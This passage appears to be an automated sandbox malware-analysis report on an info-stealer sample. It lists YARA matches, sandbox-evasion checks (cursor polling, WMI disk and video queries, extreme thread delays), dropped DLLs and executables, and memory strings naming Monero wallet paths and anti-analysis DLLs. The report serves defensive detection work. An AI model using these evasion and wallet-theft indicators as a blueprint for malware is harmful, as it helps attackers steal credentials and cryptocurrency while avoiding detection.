                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: Yara matchFile source: 31.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.JxvL46JFox50ORU3tEsaxZ2Y.exe.3d45570.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 31.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.1888965030.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000018.00000002.2588945166.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe PID: 7436, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948, type: MEMORYSTR
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSandbox detection routine: GetCursorPos, DecisionNode, Sleepgraph_2-48954
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_2-48957
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeAPI/Special instruction interceptor: Address: 7FF90818E814
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeAPI/Special instruction interceptor: Address: 7FF90818D584
                              Source: pZhQ7nTCR9R3A5r5QIQYLapT.exe, 0000000C.00000002.2515046718.00000000026AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKJ
                              Source: LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL18:44:1718:44:1718:44:1718:44:1718:44:1718:44:17DELAYS.TMP%S%SNTDLL.DLL
                              Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1888965030.0000000003D7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL18:44:2018:44:2018:44:2018:44:2018:44:2018:44:20DELAYS.TMP%S%SNTDLL.DLL
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeMemory allocated: 1400000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory allocated: 1000000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeMemory allocated: 4D40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeMemory allocated: 1750000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeMemory allocated: 5100000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory allocated: 930000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory allocated: 2260000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeMemory allocated: 4260000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeMemory allocated: D70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeMemory allocated: 47B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeMemory allocated: 1500000 memory reserve | memory write watch
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeMemory allocated: 3150000 memory reserve | memory write watch
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeMemory allocated: 5150000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 11A0000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2D10000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1230000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 16E0000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3130000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 5130000 memory reserve | memory write watch
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeMemory allocated: 1530000 memory reserve | memory write watch
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeMemory allocated: 3290000 memory reserve | memory write watch
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeMemory allocated: 16A0000 memory reserve | memory write watch
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCursorPos,GetCursorPos,Sleep,GetCursorPos,__aulldiv,Sleep,2_2_00433130
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 499Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\sdhsfd[1].exeJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeDropped PE file which has not been started: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeM3rFKsjF1QTDth5a (copy)Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\unins000.exe (copy)Jump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_iscrypt.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\is-Q0C3D.tmpJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeDropped PE file which has not been started: C:\ProgramData\jewkkwnf\jewkkwnf.exeJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeDropped PE file which has not been started: C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcr71.dll (copy)Jump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-LNCCE.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\libeay32.dll (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\Qt5OpenGL.dll (copy)Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_shfoldr.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\ssleay32.dll (copy)Jump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MvOwPcqDrYVlvFIqJren.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-P2EA6.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcp71.dll (copy)Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\libssl-1_1.dll (copy)Jump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\Documents\iofolko5\5hZhKNjlLZuuPtI0L125s4tL.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-JC1FU.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-BDTFI.tmpJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-BKLVU.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-KPLGI.tmpJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\AKEGHIJJEH.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_setup64.tmpJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeDropped PE file which has not been started: C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeJump to dropped file
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_8-5969
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeAPI coverage: 1.9 %
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe TID: 7440Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe TID: 7456Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7632Thread sleep count: 499 > 30Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7632Thread sleep time: -99800s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7508Thread sleep time: -300000s >= -30000sJump to behavior
